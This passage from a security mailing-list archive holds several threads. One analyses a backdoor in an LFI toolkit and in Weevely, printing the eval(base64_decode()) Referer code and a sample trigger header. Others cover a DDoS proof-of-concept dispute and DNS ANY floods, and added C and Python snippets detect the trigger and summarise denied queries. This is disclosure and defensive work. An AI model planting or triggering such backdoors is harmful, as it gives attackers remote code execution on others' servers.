parse_str($_SERVER['HTTP_REFERER'],$a);
if(reset($a)=='my' && count($a)==9) {echo '<pass>';eval(base64_decode(str_replace(' ', '+', join(array_slice($a,count($a)-3)))));echo '</pass>';}

For more details you can refer to a relevant post I wrote recently [2]. I haven't dug into the r00t 4 LFI source code, but from your analysis the similarities are pretty obvious.

ps: This email has been BCC'ed to the Weevely developer.

[1] http://code.google.com/p/weevely/
[2] https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/

On 02/19/2012 07:01 PM, InterN0T Advisories wrote:

Dear Full Disclosure readers,

Today I saw Joe McCray, among others, tweet about the (new) r00t 4 LFI Toolkit, that according to its description:
--- This tool is a php script that assists in performing local file inclusion attacks. ---
should be able to perform local file inclusion attacks.

-:: Overview ::-
After studying this tool for a brief 5 minutes, it was obvious that it was nowhere near what I hoped it to be, as the tool only uses one method, the /proc/self/environ vector (as seen on e.g., the intern0t forums and many other sites). The tool is therefore not capable of performing attacks, but only 1, single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses is far from new and doesn't always work either, but it's a nice trick that e.g., SirGod wrote about on the intern0t forums in 2009. (This tool was released the 18th February 2012.)

-:: Vulnerabilities ::-
Further study of this tool reveals:
- None of the output from the tool is sanitized, meaning the attacker using the script can get XSS'd (and CSRF'd) if the target has changed e.g., the 'uname -a' command (which is relatively simple to do) to include (print) JavaScript instead. If this happens, the attacker may end up attacking himself, crashing or something third, depending on the type of XSS payload.
- The most interesting part is on line 92, where the developer (KedAns-Dz) has decided to backdoor the tool.

-:: The Backdoor ::-
Analysis of the backdoor: By sending a HTTP request that includes a specially crafted referer, it is possible to execute PHP code:
--- Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw== ---
This referer will make the script execute: phpinfo();

-:: Code Review ::-
The code that enables the developer to use the script as a backdoor looks like the following:
---
parse_str($_SERVER['HTTP_REFERER'],$a);
if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(' ', '+', join(array_slice($a,count($a)-3)))));echo '</star>';}
---
It certainly took a little bit of study to trigger, but in essence here's what it does:
1. Parse the HTTP Referer string into variable: $a (Referer: is not included.)
2. If the first array value (not key / arg) is a string named: iz
3. And if there are 9 (different) arrays, then
4. Print out the contents of.. This requires a bit more in-depth explanation:
A) Evaluate the following as PHP code:
B) Base64_decode the input:
C) Replace (space) with + (plus), in case they occur.
D) Use the last three array values from the HTTP referer. (You don't have to use all three, using the last will work fine.)

To make it all a lot more simple:
--- Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64 Code that will be executed as PHP.] ---

Screenshot: http://i.imgur.com/PXcSX.png
References: http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
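As a defender-side illustration of the trigger shape the analysis above describes (exactly nine key=value pairs, a fixed first value, base64 in the last three), here is an added example, not code from the advisory or from the Weevely NIDS post: a small checker that flags a Referer value matching that shape, usable from a log scanner or proxy filter. The sample headers are constructed; the real trigger carries '&' between pairs, which the list archive stripped.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Shape of the backdoor trigger as described in the analysis above:
 * exactly nine key=value pairs, the first value a fixed magic string
 * ("iz" for r00t 4 LFI, "my" for Weevely <= 0.4), the last three values
 * base64 (spaces tolerated, since the backdoor rewrites them to '+'). */
#define TRIGGER_PARAM_COUNT 9
#define MAX_PARAMS 64
#define MAX_REFERER 2048

static bool is_base64ish(const char *s) {
    for (; *s; s++) {
        char c = *s;
        bool ok = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                  (c >= '0' && c <= '9') || c == '+' || c == '/' ||
                  c == '=' || c == ' ';
        if (!ok) return false;
    }
    return true;
}

/* Returns true when the Referer value has the trigger shape for `magic`.
 * Mirrors PHP's parse_str loosely: pairs split on '&', value is whatever
 * follows the first '=', a pair without '=' counts as an empty value,
 * empty segments (e.g. a trailing '&') are ignored. */
bool looks_like_backdoor_referer(const char *referer, const char *magic) {
    char buf[MAX_REFERER];
    size_t len = strlen(referer);
    if (len == 0 || len >= sizeof buf) return false;
    memcpy(buf, referer, len + 1);

    const char *values[MAX_PARAMS];
    int n = 0;
    char *pair = buf;
    while (pair) {
        char *amp = strchr(pair, '&');
        if (amp) *amp = '\0';
        if (*pair) {
            if (n >= MAX_PARAMS) return false;
            char *eq = strchr(pair, '=');
            values[n++] = eq ? eq + 1 : "";
        }
        pair = amp ? amp + 1 : NULL;
    }
    if (n != TRIGGER_PARAM_COUNT) return false;
    if (strcmp(values[0], magic) != 0) return false;

    /* The backdoor joins the last three values and base64-decodes them;
     * require those to look like base64 and to carry at least one byte. */
    size_t payload = 0;
    for (int i = n - 3; i < n; i++) {
        if (!is_base64ish(values[i])) return false;
        payload += strlen(values[i]);
    }
    return payload > 0;
}

int main(void) {
    /* Constructed samples, not captured traffic. */
    const char *samples[] = {
        "a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==",
        "http://example.com/page?id=5",
        "k1=iz&k2=&k3=&k4=&k5=&k6=&k7=&k8=&k9=<script>",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s\n", looks_like_backdoor_referer(samples[i], "iz"),
               samples[i]);
    return 0;
}
```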
Re: [Full-disclosure] Arbitrary DDoS PoC
If the design is broken then the implementation is broken. Have you READ your own source code? Do you understand what it's actually doing? Rhetorical questions of course, but still. Your PoC calls curl multiple times via a list of proxies. No more, no less. If you are going to claim that such a thing is an effective general technique, YOU have to back up that claim, not me or anyone else on this list. I never bothered running it because anyone who read that simple Python code (which was a good thing, it's simple) can understand what it is doing, and do a mental comparison to what they previously knew about the subject of DoS. Your PoC does not demonstrate anything new; it demonstrates existing knowledge that is generally known to not be an effective method for DoSing, for all the reasons I explained in my previous mails. I think it's quite pedantic of you to only criticize me for calling out the ineffectiveness of your PoC. You did not address anything I or anyone else said about your claim. If you think I am wrong or mistaken in my personal assessment of your claim then you are the one who must show how and why to defend your claim. Belittling someone who criticizes you is not professional, not productive, does not give strength to your claim, and does not make you right. The end of the line is I don't care what you claim your code does, I care about what the code does, and your code is not an effective general technique for denial of service attacks.

On Feb 13, 2012 8:48 PM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote:

I could argue that an attack targeted at a service, especially HTTP, is not measured by the band, but the requests, especially the heavier; could argue that a technique is the most inherent characteristic of multiple sources of traffic and still relying on trust. I could still say that is an implementation that relates only to say "Look, it exists!"; I could still prolong explaining about overheads, and using about the same time many sites that make the requests, thus reducing the wake of a failure, even if you say easily diagnosable. But I'd rather say that it is actually very pedantic of you to label something as inefficient, especially when not done a single test, only the pedantic observation of someone whose interests it is reprehensible. I will not say you're one of those, but this is really an attitude typical of this kind, which is certainly not a hacker. Thanks to people like that, do not know if you like, there are many flaws yet to be explored. If anyone wants more information, obviously I will ask to send an email or call me to give a presentation, I will not think about anything. My goal in was invited researchers to study DDoS on this model, because anytime someone can direct thousands to generate a network congestion.

On 13-02-2012 11:17, Gage Bystrom wrote:

Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target; it's still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however, as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawns and rely on sheer numbers and/or superior resource exhaustion methods.

On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote:

With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need to acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable; DNS, internet proxies, and many sites that make requests of user like Facebook or W3C also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy
Re: [Full-disclosure] Arbitrary DDoS PoC
Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target; it's still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however, as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawns and rely on sheer numbers and/or superior resource exhaustion methods.

On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote:

With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need to acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable; DNS, internet proxies, and many sites that make requests of user like Facebook or W3C also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request.

[1] https://github.com/lfamorim/barrelroll

Cheers,
Lucas Fernando Amorim
http://twitter.com/lfamorim
Re: [Full-disclosure] Arbitrary DDoS PoC
Absolutely and that's partly my point. The methods you describe are nigh exactly how modern general DDoS techniques work, which is not how this works. One problem is you can't use Facebook or Google as an open proxy like you're saying because 1.) It assumes you can force Google or Facebook to make multiple requests for just one of your requests, else you are still stuck with how much you can output vs how much they can take. Just because you can tweak how much you can send does not change the basic principle behind this and 2.) It no longer becomes a general method because you must abuse a particular flaw in a particular service to get it to use its resources to flood the target's resources. Not trying to really argue your examples, I'm just saying his script and his bug report or whatever you call it is terribly ineffective as a general method compared to pretty standard techniques like you described, and does not abuse any implementation or protocol to be a specific flaw a la the Apache DoS bug a few months ago. It's like he's claiming he found the new smurf attack when all the attack is is a script calling curl through a proxy; torrenting the latest distro install disk is a bigger DoS technique than this.

On Feb 13, 2012 5:48 AM, adam a...@papsy.net wrote: I have to admit that I've only read the posts here, haven't actually followed the link, but in response to Gage: It entirely depends on how it's being done, specifically: what services/applications are being targeted and in what way. If he's proxying through big servers such as those owned by Facebook, Google, Wikipedia, etc: then it definitely does make a difference. You're assuming that his network speed would be the bottleneck, but to make that assumption, you first have to assume that he's actually waiting around for response data. Maybe it's too early to convey this in an understandable way, I don't know.
An example scenario that would be effective though: imagine that you run a web server, also imagine that there's a resource (CPU/bandwidth) intensive script/page on that server. For the sake of discussion, let's assume that my home internet speed is 1/10 of your server. We can also probably assume that your server's network speed is 1/10 of Google's. If I can force Google's server to request that page, that automatically puts me at an advantage (especially if I close the connection before Google can send the response back to me). Even if you're correct about his particular script, the logic behind your response is flawed. In the above example, one could use multithreading to cycle requests to your server through Google, Facebook, Wikipedia, whoever. As soon as the request has been sent, the connection could be terminated. If that for some reason wouldn't work, the script could wait until one byte is received (e.g. the 2 in 200 OK) and close the connection then. At that point, the bandwidth/resources would have already been used. The bottom line is that you could easily use the above concepts (and likely what the OP has designed) to overpower a server/service while using very little resources of your own. It's all circumstantial anyway though. My overall point, specifics aside, is that being able to use Google or Facebook's resources against a target is definitely beneficial and has all kinds of advantages.

On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.com wrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, it's still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness.
It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawns and rely on sheer numbers and/or superior resource exhaustion methods.

On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that has not been addressed is the model where the zombies were not compromised by a Trojan. In the standard model of a DDoS attack, the machines are purchased, usually as VPSs, or are obtained through Trojans, thus forming a botnet. But the arbitrary form doesn't need to acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P
Re: [Full-disclosure] Chat Embeds -- How Evil Are They???
This seemed amusing at first, right up until you 'take over' the chatroom by clicking make owner from a staff name. I'll give you the benefit of the doubt that the example could have just been executed badly.

On Feb 2, 2012 1:04 AM, Stefan Jon Silverman s...@sjsinc.com wrote: Folks: An interesting subject that I have never seen discussed here but one I want to put on the table. Apparently Xat (as a chat embed) has so many holes in it that a brick of Swiss cheese would be jealous... a room I have there on one of my websites ended up w/ Superman sheets wallpaper when I clicked on a chatter's house icon from my room owner's account and also managed to change my management password denying me access to those capabilities until I reset (my cookie functions from w/in chat box remained active)... There is a cute vid demonstrating how to take over a chat room at -- http://www.youtube.com/watch?v=wHcRLolT7Z8 I have also found similar ills in other chat embeds like Chatango, etc. Talk among yourselves now -- Regards, Stefan -- Stefan Jon Silverman http://www.sjsinc.com/cgi-bin/DoRedirect?sig-google- Founder / President, SJS Associates, N.A., Inc., A Technology Strategy Consultancy. Cell 917 929 1668, eMail s...@sjsinc.com, www.sjsinc.com http://www.sjsinc.com/?%20eMail%20Sig Aim: LazloInSF Msn: LazloInSF Yahoo: sjs_sf. Weebles wobble but they don't fall down
Re: [Full-disclosure] Exploit Pack - New video - Ultimate 2.1
Not to mention he was originally accused of stealing code from the metasploit base without attribution. That and multiple risky signs on his first website and such. It truly is a wonder that no one has dropped him in a zine or anything like that. Blackhats read FD just as much as the professionals, and both sides of the fence don't like this guy. I blame the fact that getting a version of FrontPage that old to run on a modern x64 box is nigh impossible and ergo, extremely hard for the average schmoe to dev an exploit for that known vulnerable version. I respect his hoster who managed to do so. Respect in a macabre fascination sort of way.

On Jan 31, 2012 10:35 AM, Nate Theis ntth...@gmail.com wrote: He's a security searcher: he searches exploit-db to find PoCs to steal.

On Jan 30, 2012 2:25 AM, Mario Vilas mvi...@gmail.com wrote: I fear the day when he finally succeeds in making enough people believe he's a real security researcher. I wish attrition.org did a piece on him in the charlatans section.

2012/1/30 Peter Osterberg j...@vel.nu: This is Juan Sacco's new spam puppet. He just posted the same thing using his real name elsewhere.

nore...@exploitpack.com wrote: Exploit Pack - New video! Release - Ultimate 2.1 Check it out! http://www.youtube.com/watch?v=4TrsFry13TU Exploit Pack Team http://exploitpack.com

-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] DNS bind attacks
Other than the fact they may somehow notice this and start trying to autoban sites you should be fine. Since he is spoofing it would be hard for him to tell without trying it out on a box he controls. If anything gets autobanned you really need then just whitelist it; if you can think of such places beforehand then go ahead and whitelist them now. Just be aware in case it's not a DDoS but really part of some exploit of sorts, as owning a bind server is obviously very appealing. Now, if ever, would be a good time to do a double check on your security measures but in all likelihood it seems like a fairly weak attack and your measures should be fine. That or we are both missing some glaring piece of information.

On Jan 26, 2012 3:36 AM, J. von Balzac jhm.bal...@gmail.com wrote: I'm seeing a lot of hosts in my named logs (I mean log files, it's not like I am naming my poop) ...ok... silly joke hehe. So anyway, named bind is reporting a lot of denied queries of type 'isc.org/ANY/IN'. I'm not looking for a solution - I have one (which is to immediately block the IPs for port 53 after as few as one denied query) - but I want to warn server admins who haven't spotted both these queries and other denied queries. Common sense suggests that these hosts are probably spoofed IPs. Looks like an effective way to DDoS a host: request an arbitrary DNS record with a spoofed IP and let the server reply to the spoofed IP in whatever way. Do that with many hosts and there is your denial of service. A side effect is that when you block the IP, you're blocking something that isn't really doing anything wrong as it's a spoofed IP. But ok, I'm not too sure of this so please shoot holes in my theory or suggest better fixes/workarounds/...
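Triage for the log pattern discussed in this thread, as an added Python example that is not code from either poster: it parses BIND "query ... denied" lines, counts denied ANY queries per source address with a whitelist applied, and lists sources over a threshold. Because the thread notes the sources are probably spoofed, the output is a review list for the whitelisting step Gage describes, not an automatic block. The sample log lines are constructed (modelled on the BIND 9 security-category format, including the newer variant with a client handle), and the addresses, threshold and whitelist are assumptions.

```python
"""Summarise denied ANY queries from BIND named logs for review.

Added example for the thread above; not code from the posters. Log lines are
constructed to resemble BIND 9 "query (cache) '...' denied" messages.
"""
import ipaddress
import re
from collections import Counter

# Matches both "client IP#port: query ..." and the newer
# "client @0xHANDLE IP#port (name): query ..." layouts.
DENIED_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#(?P<port>\d+)"
    r"(?: \([^)]*\))?: query(?: \(cache\))? '(?P<q>[^']+)' denied"
)

# Constructed sample lines (documentation/test addresses only).
SAMPLE_LOG = [
    "Jan 26 03:12:01 ns1 named[1234]: client 198.51.100.7#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:01 ns1 named[1234]: client 198.51.100.7#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:02 ns1 named[1234]: client 203.0.113.9#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:02 ns1 named[1234]: client 198.51.100.7#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:03 ns1 named[1234]: client 192.0.2.5#40123: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:03 ns1 named[1234]: client 203.0.113.9#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:04 ns1 named[1234]: client @0x7f3a1c0 198.51.100.7#53 (isc.org): query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:04 ns1 named[1234]: client 203.0.113.9#53: query (cache) 'isc.org/ANY/IN' denied",
    "Jan 26 03:12:05 ns1 named[1234]: client 203.0.113.44#51022: query (cache) 'example.net/A/IN' denied",
    "Jan 26 03:12:09 ns1 named[1234]: zone example.com/IN: loaded serial 1",
]


def parse_denied(line):
    """Return a dict for a denied-query line, or None for anything else."""
    m = DENIED_RE.search(line)
    if not m:
        return None
    name, qtype, qclass = m.group("q").rsplit("/", 2)
    return {"ip": m.group("ip"), "port": int(m.group("port")),
            "name": name, "qtype": qtype, "qclass": qclass}


def summarize(lines, whitelist=(), threshold=3, qtype="ANY"):
    """Count denied queries of `qtype` per source, skipping whitelisted networks.

    Returns per-source and per-name counts plus the sources at or above the
    threshold. Sources may be spoofed victims, so treat the list as input to a
    manual review rather than as something to block automatically.
    """
    nets = [ipaddress.ip_network(w) for w in whitelist]
    per_client = Counter()
    per_name = Counter()
    for line in lines:
        rec = parse_denied(line)
        if rec is None or rec["qtype"] != qtype:
            continue
        per_name[rec["name"]] += 1
        ip = ipaddress.ip_address(rec["ip"])
        if any(ip in net for net in nets):     # assumed-legitimate resolvers
            continue
        per_client[rec["ip"]] += 1
    suspects = sorted(ip for ip, n in per_client.items() if n >= threshold)
    return {"suspects": suspects, "per_client": dict(per_client),
            "per_name": dict(per_name)}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG, whitelist=["192.0.2.0/24"], threshold=3)
    print("names queried with ANY:", report["per_name"])
    print("sources to review     :", report["suspects"])
```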
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
What was the offlist message he was referring to? Cause yeah, he sounds pretty new here with that kind of message. People bring in outside conversations all the time, especially if they feel it is relevant to the topic at hand. Speaking of the topic at hand: I agree with the crowd that says it is not explicitly a security bug, but more like a lack of a good feature. It should be off by default, and someone on the list already made a patch to remove the clipboard, which you shouldn't be using for sensitive information while connected to untrustworthy computers anyways. The developers should be notified that they need the feature to turn clipboard sharing off, but if they don't, choose a different VNC and be on your way. I don't view it as a security bug because it's a policy bug. It's not something where this problem exists ergo I can exploit it, it's a problem where if they do something stupid, I can take advantage of it, and oh hey their client by default doesn't mitigate this. And before someone yells at me for how I separate software bugs and policy bugs by pointing out something like a client side attack: I view such things as a mix. Policy bug that they are falling for it, and software bug for the actual exploit. And really this is a good example of a situation where if you are worried about this you have bigger problems. Why must you use VNC? Why is what you're connecting to untrustworthy? What information is directly at risk if the box you're connecting to is compromised? What information is indirectly at risk? Does the box running suspicious programs have access to the internet? Etc. Once you start going down the list of things that should be done, the need to worry about this kind of bug becomes less and less relevant. Meaning if this kind of problem IS relevant then I would almost bet money that you are doing other things really wrong and so an attacker or a bad app doesn't need to use this because they have far easier and more rewarding things to try.
On Jan 25, 2012 9:45 AM, coderman coder...@gmail.com wrote: On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote: Dear coderman, posting mails that were explicitly marked offlist on the public list is a no-go. you must be new around here... why not let everyone learn from your fail?
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Yeah good luck with reproducing it cause it REALLY sounds like a MITM or a phishing attack trying to get people to download fake AV. I would do a DNS lookup and then compare those results to that of a public web service, and save the links for the AVs to check if they have any malicious history associated with them.

On Jan 20, 2012 1:21 PM, Wesley Kerfoot wja...@gmail.com wrote: It turns out that it was a problem with Firefox. However, I do not believe I had any malicious addons or extensions for a few reasons. 1) I only had 4 extensions, adblock plus, pentadactyl, firebug, and noscript. 2) they were all vetted (presumably) by Mozilla. I believe, and this is simply speculation, that the problem may have been caused by noscript stopping/interfering with some scripts on Facebook. Facebook would assume it was malware interfering with the site, and attempt to block it. I am 99% sure my browser was not really compromised. I'm going to try and reproduce it later.

On 19 January 2012 22:57, Byron Sonne byron.so...@gmail.com wrote: Hello, “Your computer has malware!” Facebook says to me. I am really curious to know, assuming that everything you've said is accurate, how they determine you've got malware. This is rather curious. The more I think about it, the more I wonder if something's come between you and Facebook pretending to be official, hoping to trick you into downloading something. Cheers -- freebyron.org
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
What the hell are you talking about? I was just giving some advice on how he could check if it was legit or not if it happens again. What crawled up your ass and died this morning?

On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote: You should tell us what you would have done had you been on one of the hijacked Sept 11 planes. Bet things would have gone down different then, amiright? Sent from my BlackBerry® wireless device -----Original Message----- From: Gage Bystrom themadichi...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 20 Jan 2012 13:29:01 To: Wesley Kerfoot wja...@gmail.com; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Well I apologize if you consider a 'DNS lookup' to be a buzzword. I also apologize if you are incapable of understanding intent without it being spelled out for you that I was stating what I would do if I had seen that and I suggest he do something similar. What's your problem with me being specific instead of being vague about the steps? The difference between your idiotic Hollywood script and what I actually said is that I put an ounce of thought into mine. If you have a problem with what I said then explain what's wrong with it instead of going about with an ad hominem fallacy. Speaking of contribution, what the hell are you contributing with all of this? I gave some 'trite advice' as to what he could do and I framed it as what I would have done. What's so bad about that? If you can do nothing but bitch about how my advice and my phrasing makes me a horrible person then you might as well move on. I certainly know that's what I intend to do. Oh wait, you have a problem with people stating what they would do in a given situation, I'm sorry. I'll try to be more considerate next time.

On Jan 20, 2012 3:10 PM, James Condron ja...@zero-internet.org.uk wrote: Yeah, you really weren't, you were telling us how you would have handled it, with all the buzzwords and terms you could have thought of. Hell, I'm surprised you didn't manage to get the word 'synergy' in there. "I would do a dns lookup and then compare those results to that of a public web service, and save the links for the AVs to check if they have any malicious history associated with them." Reads like a bad Hollywood script: "First I would ping the phone number and see if I could telnet to the ICMP, then get the PTR of the MAC address and use an ARP overflow and spoof the TTL of the Window Size and..." (etc. etc.) What are you suggesting; take a look at where the request is coming from and make a decision based on that whether the software is being punted by Facebook or a third party?
Fine- just say that; make your suggestion and get on with your life. It's a little trite as advice goes, but if that's all you can contribute then go for it. Coming in with your Marky-Mark talk of "First I'd get the first hijacker and use his head to kill the second hijacker and then I'd be all like 'yeah, let's land the plane here- let me drive'" is not very helpful.

On 20 Jan 2012, at 22:37, Gage Bystrom wrote: What the hell are you talking about? I was just giving some advice on how he could check if it was legit or not if it happens again. What crawled up your ass and died this morning?

On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote: You should tell us what you would have done had you been on one of the hijacked Sept 11 planes. Bet things would have gone down different then, amiright? Sent from my BlackBerry® wireless device -----Original Message----- From: Gage Bystrom themadichi...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 20 Jan 2012 13:29:01 To: Wesley Kerfoot wja...@gmail.com; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Re: [Full-disclosure] Rate Stratfor's Incident Response
Exactly. People are mostly being ridiculous atm. If they told you about a vuln and did not take advantage of it they are innocent. By all means you have the right to investigate and make sure they didn't do anything else, but if they didn't they are innocent. The moment they take advantage of a vuln to door you, steal important system files, or steal confidential information they are guilty. Accidentally finding a document is not a crime either. I really hate physical analogies but I think this one is relevant: It would be like if someone found your wallet and saw your credit card, SSN card (which you shouldn't carry with you), and your driver's license, and then found you to give it back. If they didn't do anything with it they are fine. People need to realize that the internet is the modern wild west. You only trust strangers enough to do business with them. You can't expect strangers to immediately understand your way of doing things. Real law enforcement only gets involved if something big happens. Attackers are the modern bandits, from the lowly script kiddie to the Billy the Kids running around. You hire your sheriff because he's the best shot around. Why are people saying that the sharpshooters of this day shouldn't become sheriffs just because of prior activities? Of course you're not going to hire the guy that shot up your joint, but what real reason do you have to not hire the guy that shot up other places? A good shot's a good shot and if he's willing to come clean then hand him the soap. Yeah I believe we shouldn't be hiring script kiddies, but we shouldn't discriminate against where people honed their skills. Especially something like security where they had to have their skills down on a day to day basis where it really counts. As for people complaining about them not knowing how to secure things, ethics, etc: well you have a very poor knowledge of the underground hacker's psychology.
I've spent my share of time observing the underground, talking amongst others out of curiosity. They have more ethics than most day to day people. The good ones, the ones you'd want to hire, KNOW how to secure stuff. Why? Well the secure one is easy: they don't want to get pwned, and they don't want their targets to get pwned by other people. They have to know how to be defensive or they lose their trophies. The ones that don't eventually learn that they need to start learning. The ethics claim may seem strange but consider this: this is a society of sorts where everyone works together to expose fraudulent vendors so they don't get scammed, no legit person screws over their clients and clients don't screw over vendors because the only business license is your reputation. And it's a well understood rule that is pounded into newbs that you don't fuck up your own workplace. They make it clear that it's too risky and that it'd be the same as screwing over your clients. You may not trust these people, but that's because you don't understand what they value, how they build trust amongst themselves and more importantly you don't know how to build trust with them. No wonder it's surprising if your company gets pwned cause you don't remotely try to understand the ones really doing the damage. You don't talk to them, ask them questions, you don't share interesting knowledge with them. You are being an antithesis to everything they value and not bothering to see if you should be against some of those values.
On Jan 13, 2012 12:04 PM, Laurelai laure...@oneechan.org wrote: On 1/13/12 1:24 PM, Paul Schmehl wrote: --On January 13, 2012 12:03:22 PM -0500 Benjamin Kreuter ben.kreu...@gmail.com wrote: On Fri, 13 Jan 2012 10:37:31 -0600 Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On January 12, 2012 3:16:19 PM -0500 Benjamin Kreuter ben.kreu...@gmail.com wrote: The law is not going to stop the really bad people from attacking your system, nor is it going to stop them from profiting from whatever access they gain; sending law enforcement after someone who reports problems to you accomplishes little and only discourages people who might try to help you. Assuming everyone's motives are as pure as the driven snow is a bit naive, don't you think? Are there lingering doubts about the motives of someone who is reporting a vulnerability to you? They could have just profited from their discovery and never bothered to tell you. In any case, what have you accomplished by sending the cops after *someone who is helping you*? Unless you're a complete fool, yes. You say you're helping me, but you broke in to my server. How do I know you didn't help yourself to a permanent back door? Again, it's naive to think that most people are motivated purely by a desire to help others, especially when they are actively intruding into other people's assets. YOU might say thank you, but I'll be taking the server offline, grabbing forensic images and rebuilding it long before I get around to
Re: [Full-disclosure] facebook
Yeah, just mark those as spam. People with auto reply when they are on a mailing list are dumb. And yeah FB has no responsibility over apps. Generally an SQLi or whatnot is going to the app owner's site, not FB, so why should they care?

On Jan 2, 2012 12:48 PM, t0hitsugu tohits...@gmail.com wrote: uh..wtf?

On Jan 2, 2012 12:46 PM, syka...@astalavista.com wrote: Ladies and gentleman, I will be unplugged from my email until the 17th of January. In the mean time here's a video of a bunny opening your mail http://www.youtube.com/watch?v=LMyaRmTwdKs Your mail will not be forwarded and I will contact you when I come back, alternatively you can contact one of the other administrators or email i...@astalavista.com Merry Christmas and a happy new year! Best regards, Sykadul
Re: [Full-disclosure] Nmap
(I don't have the original, so I'll quote this guy) Nmap has an option to change how it determines if a host is up by attempting a port connection instead. I find this to be highly effective. Using a couple of standard ports is best, such as 80, 21, etc. If you only have a few ports you're searching for, then drop host discovery and scan those specific ports; you'd get the same results but a tad bit less overhead (mainly in the sense of stealth or an obsession with not wasting bandwidth if you can help it).

